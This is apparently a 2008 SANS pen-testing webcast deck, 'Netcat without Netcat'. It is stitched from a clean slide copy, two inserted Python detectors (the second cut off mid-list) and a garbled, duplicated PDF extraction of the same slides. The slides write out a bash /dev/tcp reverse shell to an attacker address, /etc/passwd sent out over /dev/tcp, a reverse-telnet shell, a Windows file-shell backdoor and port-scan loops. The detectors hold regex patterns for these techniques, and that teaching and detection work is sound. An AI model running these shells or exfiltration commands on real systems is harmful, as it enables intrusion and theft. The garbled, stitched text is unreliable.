  – Netcat functionality is very useful in making one system attack another machine
  – But the project’s rules of engagement may prohibit installation of additional software such as Netcat on compromised targets
  – Some anti-virus tools detect and block Netcat
  – Live off the land: Be a command-line MacGyver
  – Where we’re going, we don’t need Netcat

[Diagram: Attacker – shell access – Conquered Target – scan, analyze, exploit – Next Target]

Useful Netcat Functions

• As we’ve seen, Netcat can be used in countless different ways
• Let’s pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We’ll vary the order in which we do each action, as we’ll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows

Linux

• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior

Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener

Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered

[Diagram: the Protected Server runs /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1 (commands executed here); a firewall blocks incoming connections; the attacker runs nc -l -p [p] and types commands there]

Linux Command-Line Reverse Shell Backdoor In Action

[Screenshot]

Linux Command-Line Port Scanner

• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the “Connection Refused” text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file

[Screenshot callout: Port 80 is listening]

Storing Results and Iterating

• But it does set the error condition variable “$?” to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers

Command-Line Port Scanner In Action

[Screenshot callout: 5 Not Closed]

Linux Command-Line Backdoor via “Reverse Telnet”

• There’s a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to “Reverse telnet”
• On target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on attacker’s machine via port1
• Receive output on attacker’s machine on port2

Reverse Telnet Shell in Action

[Screenshot]

Windows

• Built-in command-line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don’t) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows

Building Blocks: Windows FOR Loops

• Iteration can be very helpful
  – We’re not expecting you to be programmers
  – But sometimes you’ll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won’t go through them again here

Windows Port Scanner Using Telnet Client

• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it… When it stops, hit CTRL-] (the telnet escape key) and then type quit to resume
  – Or kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn’t finished checking

More Problems with Windows Telnet Client as a Port Scanner

• Other problems:
  – Results aren’t logged
    • You can’t do anything with Standard Out of telnet client
  – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-f [filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way!

Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can’t specify port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify dest port in an FTP command file:
  – open [IPaddr] [port]
• Then, the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We’ll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration

The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on open port, then moves on
  – That’s not so bad
• Another Problem: It doesn’t store results
  – We can fix that, but it gets a little ugly

Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
  C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can’t we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files

File Transfer in Action

[Screenshot]

Backdoors: The File Shell

• Now, let’s do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file:
  C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
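The Linux /dev/tcp and reverse-telnet commands from the earlier slides and the Windows FTP-loop, telnet-killer and file-shell loops above all leave distinctive command lines in process-execution logs. As an added example that is not part of the webcast, here is a small Python detector that runs the slide patterns over constructed auditd- and Sysmon-style records; the record layout, host names and addresses are assumptions.

```python
"""Flag "Netcat without Netcat" command lines in process-execution logs.

Added example, not from the SANS webcast: the regexes encode the built-in-tool
tricks the slides describe (/dev/tcp redirection, reverse telnet, the Windows
ftp -s: scan loop, the wmic telnet-killer, the file shell) so a defender can
alert on them. Log format, host names and addresses are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int      # 1-based index into the log
    technique: str    # rule name that fired
    command: str      # command line that was inspected


# Rule table: (technique name, pattern). The generic /dev/tcp rule below only
# fires when none of these more precise ones matched.
RULES = [
    # /bin/bash -i > /dev/tcp/[ip]/[port] 0<&1 2>&1  (reverse shell)
    ("linux_devtcp_reverse_shell",
     re.compile(r"(?:ba)?sh\s+-i\b.*>\s*/dev/tcp/", re.I)),
    # cat [file] > /dev/tcp/[ip]/[port]  (file transfer out of the box)
    ("linux_devtcp_exfil",
     re.compile(r"\bcat\s+\S+\s*>\s*/dev/tcp/", re.I)),
    # /dev/tcp/[ip]/$port  (port taken from a loop variable: scanner)
    ("linux_devtcp_port_scan",
     re.compile(r"/dev/tcp/[^/\s]+/\$\{?\w+", re.I)),
    # telnet [ip] [port1] | /bin/bash | telnet [ip] [port2]  (reverse telnet)
    ("linux_reverse_telnet",
     re.compile(r"\btelnet\s+\S+\s+\d+\s*\|.*\b(?:ba)?sh\b.*\|\s*telnet\b", re.I)),
    # for /L ... ftp -s:file  (FTP command file driven from a counter loop)
    ("windows_ftp_script_scan",
     re.compile(r"for\s+/L\b.*\bftp\s+-s:", re.I)),
    # wmic process where name="telnet.exe" delete  (telnet-killer loop)
    ("windows_telnet_kill_loop",
     re.compile(r"wmic\s+process\s+where\b.*telnet\.exe.*\bdelete\b", re.I)),
    # for /L %i in (1,0,2) do (for /f ... do cmd.exe /c %j ...)  (file shell)
    ("windows_file_shell",
     re.compile(r"for\s+/L\s+%\w+\s+in\s+\(\s*1\s*,\s*0\s*,\s*2\s*\)"
                r".*for\s+/f\b.*\bcmd(?:\.exe)?\s+/c\s+%\w+", re.I)),
]
DEVTCP_FALLBACK = ("linux_devtcp_redirect", re.compile(r"/dev/(?:tcp|udp)/", re.I))

# Field holding the command line in the two (constructed) record styles accepted.
CMD_FIELD = re.compile(r'(?:cmd|CommandLine)="(.*)"\s*$')


def extract_command(record: str):
    """Return the command line from an auditd- or Sysmon-style record, else None."""
    m = CMD_FIELD.search(record)
    return m.group(1).replace('\\"', '"') if m else None


def classify(command: str):
    """Return the names of every rule the command line triggers."""
    hits = [name for name, rx in RULES if rx.search(command)]
    if not hits and DEVTCP_FALLBACK[1].search(command):
        hits.append(DEVTCP_FALLBACK[0])   # generic /dev/tcp use, still worth a look
    return hits


def scan_log(lines):
    """Run every record through the rules; one Finding per (line, technique)."""
    findings = []
    for n, rec in enumerate(lines, 1):
        cmd = extract_command(rec)
        if cmd is None:
            continue
        for tech in classify(cmd):
            findings.append(Finding(n, tech, cmd))
    return findings


# Constructed sample records: lines 1-4 and 6-8 reproduce the slide commands
# with private addresses; lines 5 and 9 are benign look-alikes.
SAMPLE_LOG = [
    'type=EXECVE host=web01 cmd="/bin/bash -i > /dev/tcp/10.0.0.5/4444 0<&1 2>&1"',
    'type=EXECVE host=web01 cmd="cat /etc/passwd > /dev/tcp/10.0.0.5/9999"',
    'type=EXECVE host=web01 cmd="port=1; while [ $port -lt 1024 ]; do echo > '
    '/dev/tcp/10.0.0.7/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; '
    'port=`expr $port + 1`; done"',
    'type=EXECVE host=web01 cmd="telnet 10.0.0.5 80 | /bin/bash | telnet 10.0.0.5 443"',
    'type=EXECVE host=web01 cmd="cat /var/log/syslog | grep -i refused"',
    'EventID=1 host=WS22 CommandLine="cmd.exe /c for /L %i in (1,1,1024) do echo open '
    '10.0.0.7 %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt"',
    'EventID=1 host=WS22 CommandLine="cmd.exe /c for /L %i in (1,0,2) do wmic process '
    'where name=\\"telnet.exe\\" delete & ping -n 6 127.0.0.1"',
    'EventID=1 host=WS22 CommandLine="cmd.exe /c for /L %i in (1,0,2) do (for /f '
    '\\"delims=^\\" %j in (commands.txt) do cmd.exe /c %j >> output.txt & '
    'del commands.txt) & ping -n 2 127.0.0.1"',
    'EventID=1 host=WS22 CommandLine="ftp -s:deploy.txt"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.technique}: {f.command}")
```

The share-redirect file transfer (type ... > \\machine\share\file) is deliberately not a rule here: it looks like routine administration, so it is better correlated with the findings above than alerted on alone.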

The File Shell In Action

[Screenshot]

Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers’ actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals

Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
  – June 4-9: Las Vegas, NV: Skoudis
  – June 12-July 22: Home On-Line: Skoudis
  – July 24-29: Wash DC: Skoudis
  – Aug 11-16: Boston: Shackleford
  – Aug 18-23: Minneapolis: Conrad
  – Aug 24-29: Va Beach: Strand
• Go to www.sans.org and look for “560” for details

Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008

Page 6: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6

Software for Testing ndash

Free Test Tools

bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work

ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml

bull Other free sources of tools

ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc

ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7

Commercial Toolsbull There are numerous useful commercial tools

available for pen testers providing ndash Typically higher quality and more frequent updates

ndash Support ndash very important for professional testing

bull Useful examples include ndash CORE IMPACT ndash OS network services client-side

and web app exploitation

ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan

ndash HP SPI Dynamicsrsquo WebInspect ndash web app

vulnerability discovery and exploit

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8

Testing Network

Infrastructure - ISPbull For internal testing a fast connection near a backbone with

minimal filtering is idealbull For Internet-based testing you will need to send packets

through your ISP to the target

ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation

bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems

bull Can seriously impair your ability to test and the accuracy of your results

bull Tell your ISP that you plan to do pen tests and ask if theyblock

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10

What is Netcat

bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows

bull Takes Standard In and sends it across the network

bull Receives data from the network and puts it onStandard Out

bull Messages from Netcat itself put on Standard Error

NetcatStd Out Receive packets

Std In Send packets

Std Err

The

System

The

Network

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11

What Can Netcat Do for Usbull Send files

bull Port scan

bull Backdoor shell access

bull Connecting to arbitrary open portsbull Vulnerability scanning

bull Simple chats

bull Replay data in TCP or UDP packets

bull Relays bouncing between systems

bull Much much morehellip

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12

What Is Netcat Without

Netcatbull Netcat without Netcat involves constructing commands

that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat

bull Wersquoll rely on built-in tools only

bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone

ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp

ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client

ndash Have you ever made the Windows file system behave like acommand shell

bull YOU WILL

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13

Why Netcat without Netcatbull For penetration testers

ndash Netcat functionality is very useful in making one systemattack another machine

ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on

compromised targets ndash Some anti-virus tools detect and block Netcat

ndash Live off the land Be a command-line MacGyver

ndash Where wersquore going we donrsquot need Netcat

Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess

sca na na ly z eex p lo it

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14

Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless

different waysbull Letrsquos pick some of the most useful and see how we

can make built-in tools do each function on Linux and

Windows ndash Backdoor shell

ndash File transfer

ndash Port scanner

bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques

ndash And the order of those principles differs between Linux andWindows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15

Linuxbull devtcp rocks

bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]

ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for

Netcat-like behavior

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16

Linux Command-Line File

Transfer

bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in

bull $ cat etcpasswd gt

devtcp[IPaddr][port]bull Catch it on the other side with a Netcat

listener

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17

Linux Command-Line

Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error

of a bash shell to devtcp to implement a reverse shellbackdoor

binbash ndashi gt

devtcp[Attacker_IPaddr][port] 0ltamp1

2gtamp1

bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered

binbash ndashi gt

devtcp

[Attacker_IPaddr]

[port] 0ltamp1 2gtamp1

Firewall

Blocks

incoming

Protected Servernc ndashl ndashp [p]

TYPE COMMANDS

HERE

Commands

executed

here

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18

Linux Command-Line Reverse

Shell Backdoor In Action

Li C d Li P t

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19

Linux Command-Line Port

Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]

bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file

Port 80 is listening

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20

Storing Results and Iterating

bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed

bull For a port scanner we could use a while loop

that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==

0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done

bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for

pen testers

d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21

Command-Line Port Scanner

In Action

5 Not Closed

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22

Linux Command-Line

Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote

shell without using devtcpbull Linux telnet clients let us redirect Standard In and

Standard Out

bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |

binbash | telnet [attacker_IPaddr][port2]

bull Provide commands on attackerrsquos machine via port1

bull Receive output on attackerrsquos machine on port2

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23

Reverse Telnet Shell in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24

Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… it only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration

The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly

Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files


File Transfer in Action

Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
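Added example, not from the webcast or its author: the command lines on the telnet-killer, FTP port scanner, share-redirection and file-shell slides above, seen from the defender's side. A small Python classifier tags the cmd.exe idioms they depend on (a for /L loop with step 0, for /F feeding lines of a file to cmd /c, ping -n against 127.0.0.1 as a sleep, wmic process delete, ftp -s: with a freshly echoed open line, redirection into a UNC share) and runs over constructed process-creation log lines; the log format, host names and addresses are assumptions.

```python
import re
from typing import List

# Indicator patterns for the cmd.exe idioms the slides build on. Each one is
# weak on its own; the file shell and the telnet-killer loop light up several.
INDICATORS = {
    # for /L with a step of 0 never terminates: the spin loop behind the
    # file shell and the "kill telnet every 5 seconds" loop
    "for_l_infinite": re.compile(
        r"for\s+/l\s+%{1,2}\w+\s+in\s*\(\s*\d+\s*,\s*0\s*,\s*\d+\s*\)", re.I),
    # for /F reading a file and handing each line to cmd /c: commands
    # executed from a file rather than typed by a user
    "for_f_exec_file": re.compile(
        r"for\s+/f\b[^()]*\(\s*[\w.\\:-]+\s*\)\s*do\s+cmd(?:\.exe)?\s+/c\b", re.I),
    # ping -n <count> 127.0.0.1 chained with & is cmd.exe's substitute for sleep
    "ping_loopback_sleep": re.compile(r"&\s*ping\s+-n\s+\d+\s+127\.0\.0\.1\b", re.I),
    # wmic process where ... delete: killing processes by name from a loop
    "wmic_process_delete": re.compile(r"wmic\s+process\s+where\b.*\bdelete\b", re.I),
    # ftp driven by a script file (-s:) that the same command line just wrote
    # with "echo open <host> <port>": the FTP-client port scanner
    "ftp_script_open_port": re.compile(r"echo\s+open\s+\S+\s+\S+\s*>.*ftp\s+-s:", re.I),
    # output redirected straight into a UNC share: the type > \\host\share trick
    "redirect_to_unc_share": re.compile(r">>?\s*\\\\[\w.-]+\\[\w$.-]+\\", re.I),
}

# Indicators specific enough to alert on by themselves.
STRONG = {"for_f_exec_file", "ftp_script_open_port"}

# Constructed process-creation log format (assumed, not from any real product):
# "<timestamp> host=<name> pid=<n> image=<exe> cmdline=<full command line>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+pid=(?P<pid>\d+)\s+"
    r"image=(?P<image>\S+)\s+cmdline=(?P<cmdline>.*)$")


def assess(cmdline: str) -> List[str]:
    """Return the sorted names of all indicators matching one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def is_suspicious(tags: List[str]) -> bool:
    """Alert on one strong indicator, or on two or more weak ones together."""
    return bool(STRONG & set(tags)) or len(tags) >= 2


def scan_log(lines: List[str]) -> List[dict]:
    """Parse log lines and return an alert record for each suspicious process."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a process-creation record in the expected shape
        tags = assess(m["cmdline"])
        if is_suspicious(tags):
            alerts.append({"host": m["host"], "pid": int(m["pid"]), "tags": tags})
    return alerts


# Constructed sample log: the slides' own command lines with a placeholder
# address filled in, plus two benign lines that must not alert.
SAMPLE_LOG = [
    '2008-08-14T10:00:01 host=WS01 pid=1201 image=cmd.exe cmdline=for /L %i in (1,0,2) '
    'do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt '
    '& del commands.txt) & ping -n 2 127.0.0.1',
    '2008-08-14T10:00:05 host=WS01 pid=1202 image=cmd.exe cmdline=for /L %i in (1,1,1024) '
    'do echo open 10.0.0.5 %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt',
    '2008-08-14T10:00:09 host=WS01 pid=1203 image=cmd.exe cmdline=for /L %i in (1,0,2) '
    'do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1',
    r'2008-08-14T10:00:12 host=WS01 pid=1204 image=cmd.exe '
    r'cmdline=type report.txt > \\10.0.0.9\share\report.txt',
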